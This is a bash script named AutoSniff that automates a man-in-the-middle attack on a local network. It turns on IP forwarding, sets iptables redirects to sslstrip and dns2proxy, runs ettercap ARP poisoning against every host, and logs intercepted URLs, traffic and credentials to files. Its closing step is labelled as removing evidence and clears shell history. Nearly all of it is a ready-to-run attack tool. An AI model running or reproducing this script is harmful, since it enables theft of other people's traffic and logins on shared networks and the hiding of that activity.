#!/bin/bash
# AutoSniff Script v1.2 by LYSYyy

versions="1.2"

# LOGO
function logo
{
	echo
	echo "     ▄▄▄       █    ██ ▄▄▄█████▓ ▒█████    "
	echo "    ▒████▄     ██  ▓██▒▓  ██▒ ▓▒▒██▒  ██▒  "
	echo "    ▒██  ▀█▄  ▓██  ▒██░▒ ▓██░ ▒░▒██░  ██▒  "
	echo "    ░██▄▄▄▄██ ▓▓█  ░██░░ ▓██▓ ░ ▒██   ██░  "
	echo "     ▓█   ▓██▒▒▒█████▓   ▒██▒ ░ ░ ████▓▒░  "
	echo "     ▒▒   ▓▒█░░▒▓▒ ▒ ▒   ▒ ░░   ░ ▒░▒░▒░   "
	echo "      ▒   ▒▒ ░░░▒░ ░ ░     ░      ░ ▒ ▒░   "
	echo "      ░   ▒    ░░░ ░ ░   ░      ░ ░ ░ ▒    "
	echo "          ░  ░   ░                  ░ ░    "
	echo "                                       "
	echo "      ██████  ███▄    █  ██▓  █████▒ █████▒"
	echo "    ▒██    ▒  ██ ▀█   █ ▓██▒▓██   ▒▓██   ▒ "
	echo "    ░ ▓██▄   ▓██  ▀█ ██▒▒██▒▒████ ░▒████ ░ "
	echo "      ▒   ██▒▓██▒  ▐▌██▒░██░░▓█▒  ░░▓█▒  ░ "
	echo "    ▒██████▒▒▒██░   ▓██░░██░░▒█░   ░▒█░    "
	echo "    ▒ ▒▓▒ ▒ ░░ ▒░   ▒ ▒ ░▓   ▒ ░    ▒ ░    "
	echo "    ░ ░▒  ░ ░░ ░░   ░ ▒░ ▒ ░ ░      ░      "
	echo "    ░  ░  ░     ░   ░ ░  ▒ ░ ░ ░    ░ ░    "
	echo "          ░           ░  ░                 "
	echo
	echo -e "           \e[1;33;24mAutoSniff\e[21;90;24m by LYSY v$versions\e[21;39;24m"
	echo
}

	# THE FUNCTION OF SAVING THE SESSION
	function session
	{
		logo
		echo -e "\e[1;24mDo you want to keep sessions? [Y / N]\e[0m"
		echo
		echo -ne "\e[1;31;24mAutoSniff\e[21;0m:~# "
		read -e ODP
		echo

		# Delete session
		if [ $ODP = "N" ] ; then
			rm -r /root/$SESSION/
			echo -e "\e[1;24mSession '\e[31;24m$SESSION\e[39;24m' has benn deleted!\e[0m"
			echo
			read
		elif [ $ODP = "Y" ] ; then
			echo -e "\e[1;24mSession has been saved in '\e[31;24m/root/$SESSION/'\e[0m"
			echo
			read
		elif [ $ODP = "q" ]; then
			exit
		else
			session
		fi
		
		clear
		echo
		echo -e "\e[1;32;24m[+]\e[21;24m \e[32;24mAll clear!\e[1m The device can be disconnected from the terminal.\e[0m"
		echo
		exit
	}

	# MAIN FUNCTION WITH SAVING A SESSION
	function mainsave
	{
		xterm -geometry 73x35+1+300 -hold -e ifconfig &
		clear

		# Getting information
		logo
		echo -ne "\e[1;32;24mWhat interface you choose?: \e[1;39;24m"
		read -e INTERFACE
		killall xterm
		echo -ne "\e[1;32;24mSession name (to save the log): \e[1;39;24m"
		read -e SESSION
		clear

		# Main menu
		logo
		echo -e "\e[1;24mChoose the program versions:\e[21;24m"
		echo
		echo -e "\e[1;24m1 - \e[94;24mLite\e[39;24m (ettercap + TCP)"
		echo -e "2 - Standard (ettercap + TCP + sslstrip)"
		echo -e "3 - \e[91;24mPro\e[39;24m (ettercap + TCP + sslstrip + DNS2proxy)"
		echo -e "4 - \e[93;24mMAX\e[39;24m (ettercap + TCP/UDP + sslstrip + DNS2proxy)\e[0m"
		echo
		echo -n -e "\e[1;31;24mAutoSniff\e[21;0m:~# "
		read -e VERSION

		# Make session
		mkdir /root/$SESSION/

		# Summary
		echo
		echo -e "Network interface: '\e[1;24m$INTERFACE\e[21;24m'"
		echo -e "Session name: '\e[1;24m$SESSION\e[21;24m'"
		echo -e "Program version: '\e[1;24m$VERSION\e[21;24m'"
		echo -e "Press \e[1;24mENTER\e[21;24m, if everything agrees."
		read
		clear
		logo

		# VERSION 1
		if [ $VERSION = "1" ] ; then

			# Interface Settings
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Address list settings...\e[21;90;24m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting Ettercap...\e[21;90;24m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# VERSION 2
		elif [ $VERSION = "2" ] ; then

			# Interface Settings
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Address list settings...\e[21;90;24m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			sleep 2

			# URLsnarf
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting URLsnarf...\e[21;90;24m"
			urlsnarf -i $INTERFACE | grep http > /root/$SESSION/$SESSION.txt &
			sleep 2

			# SSLstrip
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting SSLstrip...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k -w /root/$SESSION/$SESSION.log &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting Ettercap...\e[21;90;24m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# VERSION 3
		elif [ $VERSION = "3" ] ; then

			# Interface Settings
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Address list settings...\e[21;90;24m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			sleep 2

			# URLsnarf
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting URLsnarf...\e[21;90;24m"
			urlsnarf -i $INTERFACE | grep http > /root/$SESSION/$SESSION.txt &
			sleep 2

			# SSLstrip
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting SSLstrip...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k -w /root/$SESSION/$SESSION.log &
			sleep 2

			# DNS2Proxy
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting DNS2Proxy...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T python -e python /bin/dns2proxy-master/dns2proxy.py &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting Ettercap...\e[21;90;24m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# VERSION 4
		elif [ $VERSION = "4" ] ; then

			# Interface Settings
			echo -e "\e[1;32;24m[+]\e[1;39m Address list settings...\e[21;90;24m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
			sleep 2

			# URLsnarf
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting URLsnarf...\e[21;90;24m"
			urlsnarf -i $INTERFACE | grep http > /root/$SESSION/$SESSION.txt &
			sleep 2

			# SSLstrip
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting SSLstrip...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k -w /root/$SESSION/$SESSION.log &
			sleep 2

			# DNS2Proxy
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting DNS2Proxy...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T python -e python /bin/dns2proxy-master/dns2proxy.py &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting Ettercap...\e[21;90;24m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		else
			clear
			echo
			echo -e "\e[1;91;24mThe wrong version was selected!\e[0m"
			echo
			read
			mainsave
		fi

		echo
		echo -e "\e[1;31;24m[+]\e[1;39;24m WARING!\e[0m"
		echo -e "When done, click \e[1;24mENTER\e[21;24m to remove evidence and clean up!"
		echo
		read

		# Cleaning and removal
		   echo
		   echo -e "\e[32;24m[+]\e[0m Cleaning and removal...\e[21;90;24m"
		   echo
		   killall python
		   killall sslstrip
		   killall ettercap
		   killall urlsnarf
		   killall xterm
		   echo "0" > /proc/sys/net/ipv4/ip_forward
		   iptables --flush
		   iptables --table nat --flush
		   iptables --delete-chain
		   iptables --table nat --delete-chain
		   etterlog -p -i /root/$SESSION/$SESSION.eci
		   history -c
		   sleep 1
		   clear
	
		session

	}

	# MAIN FUNCTION WITHOUT SAVING A SESSION
	function mainnosave
	{
		xterm -geometry 73x35+1+300 -hold -e ifconfig &
		clear

		# Getting information
		logo
		echo -ne "\e[1;32;24mWhat interface you choose?: \e[1;39;24m"
		read -e INTERFACE
		killall xterm
		clear

		# Main menu
		logo
		echo -e "\e[1;24mChoose the program versions:\e[21;24m"
		echo
		echo -e "\e[1;24m1 - \e[94;24mLite\e[39;24m (ettercap + TCP)"
		echo -e "2 - Standard (ettercap + TCP + sslstrip)"
		echo -e "3 - \e[91;24mPro\e[39;24m (ettercap + TCP + sslstrip + DNS2proxy)"
		echo -e "4 - \e[93;24mMAX\e[39;24m (ettercap + TCP/UDP + sslstrip + DNS2proxy)\e[0m"
		echo
		echo -n -e "\e[1;31;24mAutoSniff\e[21;0m:~# "
		read -e VERSION
		
		# Summary
		echo
		echo -e "Network interface: '\e[1;24m$INTERFACE\e[21;24m'"
		echo -e "Program version: '\e[1m$VERSION\e[21;24m'"
		echo -e "Press \e[1;24mENTER\e[21;24m, if everything agrees."
		read
		clear
		logo

		# VERSION 1
		if [ $VERSION = "1" ] ; then

			# Interface Settings
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Address list settings...\e[21;90;24m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting Ettercap...\e[21;90;24m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFACE -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# VERSION 2
		elif [ $VERSION = "2" ] ; then

			# Interface Settings
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Address list settings...\e[21;90;24m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			echo
			sleep 2

			# SSLstrip
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting SSLstrip...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting Ettercap...\e[21;90;24m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFACE -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# VERSION 3
		elif [ $VERSION = "3" ] ; then

			# Interface Settings
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Address list settings...\e[21;90;24m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			echo
			sleep 2

			# SSLstrip
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting SSLstrip...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k &
			sleep 2

			# DNS2Proxy
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting DNS2Proxy...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T python -e python /bin/dns2proxy-master/dns2proxy.py &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting Ettercap...\e[21;90;24m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFACE -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# VERSION 4
		elif [ $VERSION = "4" ] ; then

			# Interface Settings
			echo -e "\e[1;32;24m[+]\e[1;39;24m Address list settings...\e[21;90;24m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
			echo
			sleep 2

			# SSLstrip
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting SSLstrip...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k &
			sleep 2

			# DNS2Proxy
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting DNS2Proxy...\e[21;90;24m"
			xterm -geometry 75x15+1+200 -T python -e python /bin/dns2proxy-master/dns2proxy.py &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32;24m[+]\e[1;39;24m Starting Ettercap...\e[21;90;24m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFACE -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		else
			clear
			echo
			echo -e "\e[1;91;24mThe wrong version was selected!\e[0m"
			echo
			read
			mainnosave
		fi

		echo
		echo -e "\e[1;31;24m[+]\e[1;39;24m WARING!\e[0m"
		echo -e "When done, click \e[1;24mENTER\e[21;24m to remove evidence and clean up!"
		echo
		read

		# Cleaning and removal
		   echo
		   echo -e "\e[32;24m[+]\e[0m Cleaning and removal...\e[21;90;24m"
		   echo
		   killall python
		   killall sslstrip
		   killall ettercap
		   killall urlsnarf
		   killall xterm
		   echo "0" > /proc/sys/net/ipv4/ip_forward
		   iptables --flush
		   iptables --table nat --flush
		   iptables --delete-chain
		   iptables --table nat --delete-chain
		   etterlog -p -i /root/$SESSION/$SESSION.eci
		   history -c
		   sleep 1
		   clear

		clear
		echo
		echo -e "\e[1;32;24m[+]\e[21;24m \e[32;24mAll clear!\e[1;24m The device can be disconnected from the terminal.\e[0m"
		echo
		exit
	}
	
# STARTING FUNCTION
function start
{
	clear

	logo
	echo -e "                 \e[32;1;24mQuit: [\e[31;24mQ\e[32;24m]\e[21;39;24m"
	echo -e "\e[1;24mDo you want to enable the option to save the session? [Y / N]\e[0m"
	echo
	echo -n -e "\e[1;31;24mAutoSniff\e[21;0m:~# "
	read -e save

	# Saving session
	if [ $save = "Y" ]; then
		mainsave
	
	# No saving session
	elif [ $save = "N" ]; then
		mainnosave
		
	elif [ $save = "Q" ]; then
		exit
		
	elif [ $save = "q" ]; then
		exit
	
	else
		start
	fi
}

start
